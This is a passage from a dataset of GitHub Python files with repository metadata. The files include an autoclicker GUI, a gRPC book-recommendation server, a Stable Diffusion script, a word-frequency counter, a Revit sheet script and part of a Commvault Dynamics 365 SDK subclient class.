template_values;\n","repo_name":"KyleV35/KyleVermeer.com","sub_path":"handlers/games.py","file_name":"games.py","file_ext":"py","file_size_in_byte":5070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26313370490","text":"import os\n\nfrom core.graph import Graph\nfrom core.solver import Solver\nfrom core.helper import check_dir\n\n\ndef main(path, map_name, n_agents=3, random_seed=10):\n print(f\"MAPP started for {map_name}\")\n result_path = \"./routes\"\n check_dir(result_path)\n\n g = Graph()\n if not g.load_map(os.path.join(path, map_name)):\n print(f\" - load map failed: {g.error}: {map_name}.map\")\n return 1\n print(\" - load map OK\")\n\n solver = Solver(g, n_agents, map_name, \"./routes/\", random_seed=random_seed)\n if not solver.hls_pbs(verbose=1):\n print(f\"fail: {solver.error}: 
{map_name}.map\")\n return 1\n print(f\" - solved OK: {solver.n_decision} decision(s)\")\n\n if not solver.make_result(result_path):\n print(f\" - result store failed: {solver.error}: {map_name}.txt\")\n return 1\n\n print(f\" - result stored OK: {map_name}.txt\")\n return 0\n\n\n# main(\"./maps\", \"small\", 3, 13) # collision agent 2 vertex 2\n# main(\"./maps\", \"small\", 3, 212) # collision agent 2 vertex 9\n# main(\"./maps\", \"small\", 3, 100) # ok\n# main(\"./maps\", \"small\", 3, 10) # ok\nmain(\"./maps\", \"sample\")\n# random.seed(100, 2)\n","repo_name":"szobin/mapp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18943429620","text":"'''\n\nHackerank Domains: https://www.hackerrank.com/domains\n\nTutorials https://www.hackerrank.com/domains/tutorials/10-days-of-statistics\n\nHackerrank - 10 Days Of Statistics - Day 0: Mean, Median, and Mode\n\nObjective\nIn this challenge, we practice calculating the mean, median, and mode.\nCheck out the Tutorial tab for learning materials and an instructional video!\n\nTask\nGiven an array, , of integers, calculate and print the respective mean, median,\nand mode on separate lines. If your array contains more than one modal value,\nchoose the numerically smallest one.\n\nNote: Other than the modal value (which will always be an integer),\nyour answers should be in decimal form, rounded to a scale of decimal place\n(i.e., , format).\n\n'''\n\nfrom collections import Counter\n\nx = int(input())\nnumbers = sorted([int(i) for i in input().split()])\n\nmean = (sum(numbers) / x)\nmedian = (numbers[x // 2] + numbers[-(x // 2 + 1)]) / 2\nmode = sorted(sorted(Counter(numbers).items()), key = lambda x: x[1], reverse = True)[0][0]\n\nprint(mean, median, mode, sep = '\\n')\n","repo_name":"bryceandpeas/Website-and-Book-Solutions","sub_path":"Website Solutions/HackerRank/10 Days of Statistics/python/0_Day0_MeanMedianAndMode.py","file_name":"0_Day0_MeanMedianAndMode.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"40521824059","text":"from tkinter import messagebox\nfrom tkinter import *\nimport keyboard\n\napp = Tk()\napp.config(bg=\"black\")\napp.geometry('800x500')\napp.resizable(0,0)\napp.iconbitmap('FIRECLICKERAPP/Images/logo.ico')\napp.title(\"FIRECLICKER\")\n\n\n\n\n\nfrom PIL import Image, ImageTk\n# start function\n\ndef click():\n messagebox.showinfo('Info-FIRECLICKER', 'Press Enter To Start action, After Pressing Enter Wait For 5ms and The action will start, For Now There is a standard values(You can not change the values) - If something Terrible Happens Click CTRL-Q and IF that does not work Shutdown your PC :)')\n m = k()\n def attack(): \n time.sleep(5)\n for i in range(5):\n time.sleep(0.1)\n m.click(Button.left)\n \n while True: \n if keyboard.is_pressed(\"enter\"):\n attack()\n break\n if keyboard.is_pressed(\"ctrl + q\"):\n app.destroy()\n break \n \n\n\n \n \n \n \n attack()\n\n \nstartbtn = Button(app, text=\"Start\", background=\"orange\", bd=0, font=(\"Showcard Gothic\", 13), command=click)\nstartbtn.place(x=350, y=320)\n\nfrom pynput.mouse import Button, Controller as k\nimport time\n\n\n\n\n\n\n\n# IMAGE\n\n\n\n\n\n# Create a photoimage object of the image in the path\nimage1 = Image.open(\"FIRECLICKERAPP/Images/logo.png\")\ntest = ImageTk.PhotoImage(image1)\n\nlabel1 = Label(app, 
image=test, bg=\"black\")\nlabel1.place(x=-10, y=1)\n\n# Text\n\nwelcome = Label(app, text=\"FIRECLICKER\", bg=\"black\", fg=\"orange\", font=(\"Fixedsys\", 50))\nwelcome.place(x=260, y=120)\n\n\n# clicker_function\n\nspeedtext = Label(app, text=\"Speed:\", bg=\"black\", fg=\"orange\", font=(\"Arial\", 12))\nspeedtext.place(x=100, y=250)\nspeedget = Entry(app, bg=\"wheat\", width=5, font=(\"Arial\", 10))\nspeedget.place(x=160, y=253)\nspeedget.insert(0, 0.1)\nspeedunit = Label(app, text=\"ms\", bg=\"black\", fg=\"orange\", font=(\"Arial\", 12))\nspeedunit.place(x=200, y=250)\n\nclickstext = Label(app, text=\"Clicks:\", bg=\"black\", fg=\"orange\", font=(\"Arial\", 12))\nclickstext.place(x=300, y=250)\nclicksget = Entry(app, bg=\"wheat\", width=5, font=(\"Arial\", 10))\nclicksget.place(x=360, y=253)\nclicksget.insert(0, 5)\nclicksunit = Label(app, text=\"/speed\", bg=\"black\", fg=\"orange\", font=(\"Arial\", 12))\nclicksunit.place(x=400, y=250)\n\nquittext = Label(app, text=\"Quit:\", bg=\"black\", fg=\"orange\", font=(\"Arial\", 12))\nquittext.place(x=500, y=250)\nquitkey = Label(app, text=\"Press CTRL-Q\", bg=\"black\", fg=\"yellow\", font=(\"Arial\", 12))\nquitkey.place(x=540, y=250)\n\n\n\n \n\n\n \n\n \n\n\n\n\n\n\n\n\n\napp.mainloop()","repo_name":"1noahark/FireClicker","sub_path":"FIRECLICKERAPP/FIRECLICKER.py","file_name":"FIRECLICKER.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"39836794035","text":"# Task 3 - Sentence Combination\r\n# Programmed by - Sheane Jossel Tolentino\r\n\r\nimport tkinter as tk\r\nimport spacy\r\n\r\nnlp = spacy.load(\"en_core_web_sm\")\r\n\r\ndef combine_sentences():\r\n \"\"\"\r\n Description:\r\n Combines two sentences into a single sentence based on the relationship between their main verbs and predicates.\r\n\r\n Args:\r\n sentence1 (str): The first sentence to be combined.\r\n sentence2 (str): The second sentence to be combined.\r\n\r\n Returns:\r\n combined_sentence (str): The combined sentence.\r\n \"\"\"\r\n\r\n sentence1 = text_field1.get()\r\n sentence2 = text_field2.get()\r\n\r\n # Parse the sentences using spaCy\r\n doc1 = nlp(sentence1)\r\n doc2 = nlp(sentence2)\r\n\r\n # Find the root of each sentence (the main verb or predicate)\r\n root1 = [token for token in doc1 if token.head == token][0]\r\n root2 = [token for token in doc2 if token.head == token][0]\r\n\r\n # Combine the sentences based on the relationship between the roots\r\n if root1.dep_ == \"ROOT\" and root2.dep_ == \"ROOT\":\r\n # If both roots are main verbs, combine the sentences using a coordinating conjunction\r\n combined_sentence = f\"{sentence1} and {sentence2}\"\r\n elif root1.dep_ == \"ROOT\" and root2.dep_ != \"ROOT\":\r\n # If the first sentence has a main verb and the second does not, combine the sentences using the object of the first sentence\r\n combined_sentence = f\"{sentence1} {doc2[root2.i+1:].text}\"\r\n elif root1.dep_ != \"ROOT\" and root2.dep_ == \"ROOT\":\r\n # If the second sentence has a main verb and the first does not, combine the sentences using the subject of the second sentence\r\n combined_sentence = f\"{doc1[:root1.i].text} {sentence2}\"\r\n else:\r\n # If both sentences have non-root verbs, combine the sentences using the subject of the second sentence and the object of the first sentence\r\n combined_sentence = f\"{doc1[:root1.i].text} {doc2[root2.i+1:].text}\"\r\n \r\n # Create a label for output\r\n output_label = tk.Label(root, 
text=\"Sorted Sentences Based on Information Density\")\r\n output_label.pack(padx=20, pady=10)\r\n\r\n # Create the scrollbar widget\r\n scrollbar = tk.Scrollbar(root)\r\n scrollbar.pack(side=tk.RIGHT, fill=tk.Y)\r\n\r\n # Create the text widget for the output\r\n output = tk.Text(root, yscrollcommand=scrollbar.set)\r\n output.pack()\r\n \r\n # Configure the scrollbar to work with the text widget\r\n scrollbar.config(command=output.yview)\r\n\r\n # Insert the sentence into the text widget\r\n output.insert(tk.END, combined_sentence)\r\n \r\n# GUI \r\nroot = tk.Tk()\r\nroot.title(\"Task 3\")\r\nroot.geometry(\"480x360\")\r\n\r\n# Create a first label and first text field\r\nlabel1 = tk.Label(root, text = \"Enter first sentence:\")\r\nlabel1.pack(padx = 20, pady = 10)\r\ntext_field1 = tk.Entry(root, width = 30)\r\ntext_field1.pack(padx = 20, pady = 10)\r\n\r\n# Create a second label and second text field\r\nlabel2 = tk.Label(root, text = \"Enter second sentence:\")\r\nlabel2.pack(padx = 20, pady = 10)\r\ntext_field2 = tk.Entry(root, width = 30)\r\ntext_field2.pack(padx = 20, pady = 10)\r\n\r\n# Create a button\r\nbutton = tk.Button(root, text = \"Submit\", command=combine_sentences)\r\nbutton.pack(padx = 20, pady = 10)\r\n\r\nroot.mainloop()","repo_name":"sheyn018/NLP-Exercises","sub_path":"Task3.py","file_name":"Task3.py","file_ext":"py","file_size_in_byte":3253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43022125261","text":"\"\"\"\nCreate a process to call other programs\n\nVersion: 0.1\nAuthor: author\nDate: 2018-03-20\n\"\"\"\n\nimport subprocess\nimport sys\n\ndef main():\n # Get command line arguments through sys.argv\n if len(sys.argv) > 1:\n # The first command-line argument is the program itself, so start with the second\n for index in range(1, len(sys.argv)):\n try:\n # Start the subprocess through the call function of the subprocess module\n status = subprocess.call(sys.argv[index])\n except FileNotFoundError:\n print('Cannot execute %s command' % sys.argv[index])\n else:\n print('Please use command line parameters to specify the process to execute')\n\n\nif __name__ == '__main__':\n main()","repo_name":"ag143/python","sub_path":"Python-100-Days-master/Day01-15/code/Day13/multiprocess3.py","file_name":"multiprocess3.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72767338612","text":"from torch import autocast\nfrom diffusers import StableDiffusionPipeline\nfrom PIL import Image\n\nfrom shared import *\n\nmodel_id = \"CompVis/stable-diffusion-v1-4\"\n\ndef main():\n pipe = StableDiffusionPipeline.from_pretrained(\n model_id, use_auth_token=True, \n )\n pipe = pipe.to(DEVICE)\n\n num_images = 3\n # prompt = \"a photo of an astronaut riding a horse on mars\"\n prompt = \"a photo of an astronaut doing a handstand on a horse\"\n # with autocast(DEVICE_STR):\n images = pipe(\n [prompt] * num_images, \n guidance_scale=7.5, # 7 ~ 8.5\n num_inference_steps=5, \n ).images\n\n grid = image_grid(images, rows=1, cols=num_images)\n \n grid.save(prompt.replace(' ', '_') + '.png')\n\ndef image_grid(imgs, rows, cols):\n assert len(imgs) == rows*cols\n\n w, h = imgs[0].size\n grid = Image.new('RGB', size=(cols*w, rows*h))\n grid_w, grid_h = grid.size\n \n for i, img in enumerate(imgs):\n grid.paste(img, box=(i%cols*w, i//cols*h))\n return 
grid\n\nmain()\n","repo_name":"Daniel-Chin/Diffusion-Fusion","sub_path":"using_their_pipe/using_their_pipe.py","file_name":"using_their_pipe.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"568085353","text":"# _*_coding :utf-8 _*_\n# @Time :2022/7/13 18:30\n# @File : 英语文本词频统计\n# @Project : python_NCRE\nimport pprint\n\n\ndef getText():\n txt = open(r\"C:\\Users\\yui\\Desktop\\哈姆雷特.txt\", 'r').read()\n txt = txt.lower()\n for i in '?!@#$%^&*()''/<>.,+_=-~\\n \\t':\n txt = txt.replace(i, ' ') # replace each punctuation mark with a space\n return txt\n\n\ntxt_ = getText()\nwords = txt_.split() # splits on whitespace by default\n# print(words)\ncounts = {} # create a dict for counting\n\nfor i in words: # count each word in a loop\n counts[i] = counts.get(i, 0) + 1\n\n# pprint.pprint(counts)\nvip_word = list(counts.items())\nvip_word.sort(key=lambda x: x[1], reverse=True) # sort the list in place with a custom key; no reassignment needed\n\n# pprint.pprint(vip_word)\nfor i in vip_word:\n if vip_word.index(i) <= 50:\n print(i)\n else:\n break\n","repo_name":"wufake70/myPython","sub_path":"python_NCRE/实例002_英语文本词频统计.py","file_name":"实例002_英语文本词频统计.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9798255543","text":"import random\n\nfrom concurrent import futures\nfrom signal import signal, SIGTERM\n\nimport grpc\n\nimport recommendations_pb2_grpc\nfrom recommendations_pb2 import BookCategory, BookRecommendation, RecommendationResponse\n\nbooks_by_category = {\n BookCategory.MYSTERY: [\n BookRecommendation(id=1, title=\"The Maltese Falcon\"),\n BookRecommendation(id=2, title=\"Murder on the Orient Express\"),\n BookRecommendation(id=3, title=\"The Hound of the Baskervilles\"),\n ],\n BookCategory.SCIENCE_FICTION: [\n BookRecommendation(id=4, title=\"The Hitchhiker's Guide to the Galaxy\"),\n BookRecommendation(id=5, title=\"Ender's Game\"),\n BookRecommendation(id=6, title=\"The Dune Chronicles\"),\n ],\n BookCategory.SELF_HELP: [\n BookRecommendation(id=7, title=\"The 7 Habits of Highly Effective People\"),\n BookRecommendation(id=8, title=\"How to Win Friends and Influence People\"),\n BookRecommendation(id=9, title=\"Man's Search for Meaning\"),\n ],\n}\n\n\nclass RecommendationService(recommendations_pb2_grpc.RecommendationsServicer):\n def Recommend(self, request, context):\n if request.category not in books_by_category:\n context.abort(grpc.StatusCode.NOT_FOUND, \"Category not found\")\n\n books_for_category = books_by_category[request.category]\n num_results = min(request.max_results, len(books_for_category))\n books_to_recommend = random.sample(books_for_category, num_results)\n\n return RecommendationResponse(recommendations=books_to_recommend)\n\n\ndef serve():\n server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))\n recommendations_pb2_grpc.add_RecommendationsServicer_to_server(\n RecommendationService(), server\n )\n\n with open(\"server.key\", \"rb\") as fp:\n server_key = fp.read()\n with open(\"server.pem\", \"rb\") as fp:\n server_cert = fp.read()\n\n creds = grpc.ssl_server_credentials([(server_key, server_cert)])\n server.add_secure_port(\"[::]:443\", creds)\n # server.add_insecure_port('[::]:50051')\n server.start()\n\n def handle_sigterm(*_):\n print(\"Received shutdown signal\")\n all_rpcs_done_event = server.stop(30)\n all_rpcs_done_event.wait(30)\n\n signal(SIGTERM, handle_sigterm)\n    
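# Block the main thread until the server is stopped; on SIGTERM, handle_sigterm\n    # (above) gives in-flight RPCs up to 30 seconds to drain before shutdown completes.\n    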
server.wait_for_termination()\n\n\nif __name__ == \"__main__\":\n serve()\n","repo_name":"tinylambda/keep","sub_path":"microservice/project_demo/recommendations/recommendations.py","file_name":"recommendations.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"17301932355","text":"import sys\nsys.path.append('../../') #append the path where the drivers directory is placed\nfrom drivers.rtc.ds3231 import *\nimport time\n\nstartTime = time.time()\nrtc = RTC_DS3231('/dev/ttyUSB0', )\n\nrtc.initI2C(enablePower=True, enablePullUp=False)\n\ntime.sleep(0.05)\n\n\n# if False == rtc.setCurrTime():\n# print(\"Couldn't set current time\")\n#\n# if False == rtc.setCurrDate():\n# print(\"Couldn't set date\")\n\ntime.sleep(0.05)\n\nrcvTimeStr = rtc.readTime()\nprint(rcvTimeStr)\n\nrcvTimeDate = rtc.readDate()\nprint(rcvTimeDate)\n\nprint('Temperature is = {}°C'.format(rtc.readTemp()));\n\n\n\nrtc.deinitI2C()\n\nprint(time.time() - startTime);","repo_name":"slapab/BusPirateDrivers","sub_path":"applications/app_rtc_ds3231/app_rtc_ds3231.py","file_name":"app_rtc_ds3231.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34318923647","text":"\"\"\"Add selected view to selected sheets.\"\"\"\n\nfrom pyrevit import revit, DB\nfrom pyrevit import forms\nfrom pyrevit import script\nfrom Autodesk.Revit.DB import BuiltInParameter\n\n__author__ = 'Dan Mapes Modified by Martin Lou'\n__doc__ = 'Adds the selected views (callouts, sections, elevations) to the '\\\n 'selected sheets. Model views will only be added to the first '\\\n 'selected sheet since they can not exist on multiple sheets. ' \\\n 'The command defaults to active view if no views are selected.' 
\\\n '\\n\\nShift+Click:\\n' \\\n 'Pick source views from list instead of selection or active view.'\n\nlogger = script.get_logger()\n\nselected_views = []\n\n\nif __shiftclick__:\n selected_views = forms.select_views()\nelse:\n # get selection and verify a view is selected\n selection = revit.get_selection()\n if not selection.is_empty:\n logger.debug('Getting views from selection.')\n for el in selection:\n if el.Category and el.Category.Name == 'Views':\n logger.debug('Selected element referencing: {}'\n .format(el.Name))\n target_view = revit.query.get_view_by_name(el.Name)\n if target_view:\n logger.debug('Target view: {}'\n .format(revit.query.get_name(target_view)))\n selected_views.append(target_view)\n else:\n selected_view = revit.activeview\n if not isinstance(selected_view, DB.View):\n forms.alert('Active view must be placeable on a sheet.', exitscript=True)\n logger.debug('Selected view: {}'.format(selected_view))\n selected_views = [selected_view]\n\n\nif selected_views:\n logger.debug('Selected views: {}'.format(len(selected_views)))\n # get the destination sheets from user\n dest_sheets = forms.select_sheets()\n all_Viewport = []\n if dest_sheets:\n logger.debug('Selected sheets: {}'.format(len(dest_sheets)))\n with revit.Transaction(\"Add Views to Sheets\"):\n if len(selected_views) != len(dest_sheets):\n print('view selection number does not match sheet selection number')\n else:\n count = 0\n for selected_view in selected_views:\n logger.debug('Adding: %s',\n revit.query.get_name(selected_view))\n try:\n viewport = DB.Viewport.Create(revit.doc,\n dest_sheets[count].Id,\n selected_view.Id,\n DB.XYZ(17, 11, 0))\n all_Viewport.append(viewport)\n except Exception as place_err:\n print('Error placing view on sheet: {} -> {}'\n .format(selected_view.Id, dest_sheets[count].Id))\n count += 1\n revit.get_selection().set_to(all_Viewport)\nelse:\n forms.alert('No views selected.')\n","repo_name":"tkahng/nerv_pyrevit","sub_path":"CustomExtension.extension/Nerv.tab/Items.panel/Views.pulldown/Add Views to Sheets.pushbutton/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":3061,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"34423927618","text":"#!/usr/bin/python3\n# 《Python语言程序设计》 (Python Language Programming), Listing 3-4\n# Program Listing 3-4\n# Asking for change and Coins at least\n\n# Receive the amount\namount = eval(input(\"Enter an amount, for example, 11.56: \"))\n\n# Convert the amount to cents\nremainingAmount = int(amount * 100)\n\n# Find the number of one dollars\nnumberOfOneDollars = remainingAmount // 100\nremainingAmount = remainingAmount % 100\n\n# Find the number of quarters in the remaining amount\nnumberOfQuarters = remainingAmount // 25\nremainingAmount = remainingAmount % 25\n\n# Find the number of dimes in the remaining amount\nnumberOfDimes = remainingAmount // 10\nremainingAmount = remainingAmount % 10\n\n# Find the number of nickels in the remaining amount\nnumberOfNickels = remainingAmount // 5\nremainingAmount = remainingAmount % 5\n\n# Find the number of pennies in the remaining amount\nnumberOfPennies = remainingAmount\n\n# Display the results\nprint(\"Your amount\", amount, \"consists of\\n\", \"\\t\", numberOfOneDollars, \"dollars\\n\", \"\\t\", \\\n numberOfQuarters, \"quarters\\n\", \"\\t\", numberOfDimes, \"dimes\\n\", \"\\t\", numberOfNickels, \"nickels\\n\" \\\n \"\\t\", numberOfPennies, \"pennies\")\n'''\nThis program has a numeric-precision problem: converting the floating-point amount to an integer may lose precision, as in the following example:\nEnter an amount, for example, 11.56: 10.03\nYour 
amount 10.03 consists of\n \t 10 dollars\n \t 0 quarters\n \t 0 dimes\n \t 0 nickels\n\t 2 pennies\n\nProcess finished with exit code 0\n\nOne way to solve this problem is to enter the amount as an integer number of cents.\n'''\n","repo_name":"ic1396/LearnPython","sub_path":"ComputeChange.py","file_name":"ComputeChange.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74484783734","text":"from googlesearch.googlesearch import GoogleSearch\nimport sys\n\nquery = \"How to make a sql query with user input from {0}\".format(sys.argv[1])\nresponse = GoogleSearch().search(query, num_results = 100)\nnewfile = \"{0}.txt\".format(sys.argv[1])\nfd = open(newfile, 'a')\nfor result in response.results:\n\tfd.write(result.url + '\\n')\nfd.close()\n","repo_name":"AURQUIZ/Web-Crawler","sub_path":"webCrawler.py","file_name":"webCrawler.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"34875718503","text":"from ...exception import SDKException\n\nfrom ..casubclient import CloudAppsSubclient\n\n\nclass MSDynamics365Subclient(CloudAppsSubclient):\n \"\"\"\n Class representing a MS Dynamics 365 subclient.\n Class has been derived from the CloudAppsSubclient.\n \"\"\"\n\n def __init__(self, backupset_object, subclient_name, subclient_id=None):\n \"\"\"Initialize the Subclient object for the given MSDynamics365 Subclient.\n\n Args:\n backupset_object (object) -- instance of the backup-set class\n\n subclient_name (str) -- subclient name\n\n subclient_id (int) -- subclient id\n\n \"\"\"\n super(MSDynamics365Subclient, self).__init__(\n backupset_object, subclient_name, subclient_id)\n\n self._instance_object = backupset_object._instance_object\n self._client_object = self._instance_object._agent_object._client_object\n self._associated_tables: dict = dict()\n self._associated_environments: dict = dict()\n self._discovered_environments: dict = dict()\n self._discovered_tables: dict = dict()\n self._instance_type: int = 35\n self._app_id: int = 134\n # App ID for cloud apps\n self._Dynamics365_SET_USER_POLICY_ASSOCIATION = self._commcell_object._services['SET_USER_POLICY_ASSOCIATION']\n\n def _get_subclient_properties(self):\n \"\"\"Gets the subclient related properties of a MS Dynamics 365 subclient\"\"\"\n super(MSDynamics365Subclient, self)._get_subclient_properties()\n\n def _get_subclient_properties_json(self):\n \"\"\"Gets all the subclient related properties of this subclient.\n\n Returns:\n dict - all subclient properties put inside a dict\n\n \"\"\"\n\n return {'subClientProperties': self._subclient_properties}\n\n def discover_tables(self):\n \"\"\"\n Method to get the tables discovered from the MS Dynamics 365 CRM subclient\n\n Returns:\n discovered_tables (dict)-- Dictionary of returned tables\n\n \"\"\"\n self._discovered_tables = self._instance_object.discover_content(environment_discovery=False)\n return self._discovered_tables\n\n def discover_environments(self):\n \"\"\"\n Method to get the environments discovered from the Dynamics 365 CRM subclient\n\n Returns:\n discovered_environments (dict)-- Dictionary of discovered environments\n\n \"\"\"\n self._discovered_environments = self._instance_object.discover_content(environment_discovery=True)\n return self._discovered_environments\n\n @property\n def discovered_environments(self):\n \"\"\"\n Property to get the environments discovered by the Dynamics 365 subclient.\n\n If updated list is required, 
call refresh method prior to using this property.\n\n Returns:\n discovered_environments (dict)-- Dictionary of discovered environments\n \"\"\"\n if not bool(self._discovered_environments):\n self.discover_environments()\n return self._discovered_environments\n\n @property\n def discovered_tables(self):\n \"\"\"\n Property to get the tables discovered by the Dynamics 365 subclient.\n\n If updated list is required, call refresh method prior to using this property.\n\n Returns:\n discovered_tables (dict)-- Dictionary of discovered tables\n \"\"\"\n if not bool(self._discovered_tables):\n self.discover_tables()\n return self._discovered_tables\n\n def _get_associated_content(self, is_environment=False):\n \"\"\"\n Method to get the content associated with a Dynamics 365 CRM subclient\n\n Arguments:\n is_environment (bool)-- Whether to get the associated environments or tables\n Default Value:\n False\n Returns the associated tables\n\n Returns:\n associated_content_list (list)-- List of content associated with the client\n Format:\n Each list element will be a dictionary denoting that particular environment/ table\n \"\"\"\n discover_by_type: int\n if is_environment is True:\n discover_by_type = 5\n else:\n discover_by_type = 14\n\n _GET_ASSOCIATED_CONTENT = self._services['USER_POLICY_ASSOCIATION']\n request_json = {\n \"discoverByType\": discover_by_type,\n \"bIncludeDeleted\": False,\n \"cloudAppAssociation\": {\n \"subclientEntity\": {\n \"subclientId\": int(self.subclient_id)\n }\n }\n }\n flag, response = self._cvpysdk_object.make_request(\n 'POST', _GET_ASSOCIATED_CONTENT, request_json\n )\n if flag:\n if response and response.json():\n no_of_records = int()\n if 'associations' in response.json():\n no_of_records = response.json().get('associations', [])[0].get('pagingInfo', {}). 
\\\n get('totalRecords', -1)\n\n associations = response.json().get('associations', [])\n content_list = list()\n if discover_by_type == 5:\n for environment in associations:\n environment_name = environment.get(\"groups\", {}).get(\"name\")\n env_dict = {\n \"name\": environment_name,\n \"id\": environment.get(\"groups\", {}).get(\"id\"),\n \"userAccountInfo\": environment.get(\"userAccountInfo\", {}),\n \"plan\": environment.get(\"plan\", {}),\n \"is_environment\": True\n }\n content_list.append(env_dict)\n\n elif discover_by_type == 14:\n for table in associations:\n table_name = table.get(\"userAccountInfo\", {}).get(\"displayName\")\n table_dict = {\n \"name\": table_name.lower(),\n \"environment_name\": table.get(\"userAccountInfo\", {}).get(\"ParentWebGuid\", \"\").lower(),\n \"userAccountInfo\": table.get(\"userAccountInfo\", {}),\n \"plan\": table.get(\"plan\", {}),\n \"is_environment\": False\n }\n content_list.append(table_dict)\n return content_list\n # return content_list, no_of_records\n return []\n raise SDKException('Response', '101', self._update_response_(response.text))\n\n def get_associated_tables(self, refresh: bool = False):\n \"\"\"\n Method to get the tables associated with a Dynamics 365 CRM client\n\n Arguments:\n refresh (bool)-- Whether to refresh the dictionary contents\n If True, the latest associations are fetched and returned\n\n Returns:\n associated_tables (list)-- List of tables associated with the client\n Format:\n Each list element will be a dictionary denoting that particular table\n Dictionary keys/ format will be:\n name : name of the table\n environment_name : name of the environment to which the table belongs to\n plan: Dynamics 365 plan used for content association\n is_environment: False for a Table\n userAccountInfo: Metadata info for that table\n\n Sample Response:\n {\n 'name': 'account',\n 'environment_name': 'sample-environment-name',\n 'userAccountInfo':\n {\n 'aliasName': 'https://.crm.dynamics.com/api/data/v9.1/account',\n 'displayName': 'Account',\n 'ParentWebGuid': 'org-environment-name',\n 'lastBackupJobRanTime': {'time': },\n 'IdxCollectionTime': {'time': },\n 'user': {\n '_type_': 13,\n 'userGUID': '>'\n }\n },\n 'plan': {\n 'planName': '', 'planId': },\n 'is_environment': False\n }\n Environment name/ URL in the sample response is for description purpose only\n\n \"\"\"\n if refresh is True:\n self._associated_tables = self._get_associated_content(is_environment=False)\n return self._associated_tables\n\n def get_associated_environments(self, refresh: bool = False):\n \"\"\"\n Method to get the environments associated with a Dynamics 365 CRM client\n\n Arguments:\n refresh (bool)-- Whether to refresh the dictionary contents\n If True, the latest associations are fetched and returned\n\n Returns:\n associated_environments (list)-- List of environments associated with the client\n Format:\n Each list element will be a dictionary denoting that particular environment\n Dictionary keys/ format will be:\n name : name of the environment\n plan: Dynamics 365 plan used for content association\n is_environment: True for an environment\n userAccountInfo: Metadata info for that environment\n\n Sample Response:\n {\n 'name': 'sample-environment-name',\n 'id': '>',\n 'userAccountInfo':\n {\n 'aliasName': 'https://.crm.dynamics.com',\n 'itemType': 0,\n 'ItemClassification': 0,\n 'displayName': 'org-environment-display-name',\n 'BackupSetId': 0,\n 'isAutoDiscoveredUser': False,\n 
'lastBackupJobRanTime': 'time': ,\n 'IdxCollectionTime': {'time': },\n user': {\n '_type_': 13,\n 'userGUID': ''\n }\n },\n 'plan': {'planName': '', 'planId': },\n 'is_environment': True}\n\n \"\"\"\n if refresh is True:\n self._associated_environments = self._get_associated_content(is_environment=True)\n return self._associated_environments\n\n def _set_association_json(self, is_environment: bool = False):\n \"\"\"\n JSON to set the content association for a Dynamics 365 CRM client\n\n Arguments:\n is_environment (bool): Whether the content to be associated is an environment\n Default Value:\n False\n Returns:\n set_content_association_json (dict)-- Content Association JSON\n \"\"\"\n set_content_association_json = {\"LaunchAutoDiscovery\": is_environment,\n \"cloudAppAssociation\": {\n \"accountStatus\": 0,\n \"cloudAppDiscoverinfo\": {\n \"userAccounts\": [\n ],\n \"groups\": [],\n \"discoverByType\": 14 if is_environment is False else 15\n }\n , \"subclientEntity\": self._subClientEntity}}\n\n return set_content_association_json\n\n def _set_content_association(self, content_json: dict):\n \"\"\"\n Method to associate some content to a Dynamics 365 CRM client...\n\n Arguments:\n content_json (dict)-- Association JSON to be used for the content\n \"\"\"\n flag, response = self._commcell_object._cvpysdk_object.make_request(\n 'POST', self._Dynamics365_SET_USER_POLICY_ASSOCIATION, content_json\n )\n\n if flag:\n try:\n if response.json():\n if response.json().get('resp', {}).get('errorCode', 0) != 0:\n error_message = response.json()['errorMessage']\n output_string = 'Failed to Create Association for a Dynamics 365 CRM client\\nError: \"{0}\"'\n raise SDKException(\n 'Subclient', '102', output_string.format(error_message)\n )\n else:\n self.refresh()\n except ValueError:\n raise SDKException('Response', '102')\n else:\n response_string = self._commcell_object._update_response_(response.text)\n raise SDKException('Response', '101', response_string)\n\n def _table_association_info_json(self, tables_list: list):\n \"\"\"\n Private Method to create the association JSON for associating tables\n to a Dynamics 365 CRM client.\n\n Arguments:\n tables_list (list)-- List of tables to be associated to the content\n List Format:\n Each list element should be a tuple of the format:\n (\"environment_name\",\"table_name\")\n environment_name is the name of the environment to which the table belongs to\n table_name is the name of the table to be associated\n\n Returns:\n tables_info (list)-- List of metadata info for the tables to be used for associating content\n \"\"\"\n tables_info: list = list()\n _discovered_tables = self.discovered_tables\n\n if not bool(_discovered_tables):\n raise SDKException('Subclient', '101',\n \"Discovered Tables is Empty.\")\n\n for _table in _discovered_tables:\n _table_name, _parent_env_name = _table[\"displayName\"].lower(), _table[\"ParentWebGuid\"].lower()\n try:\n if (_parent_env_name, _table_name) in tables_list:\n _table_assoc_info = _table\n 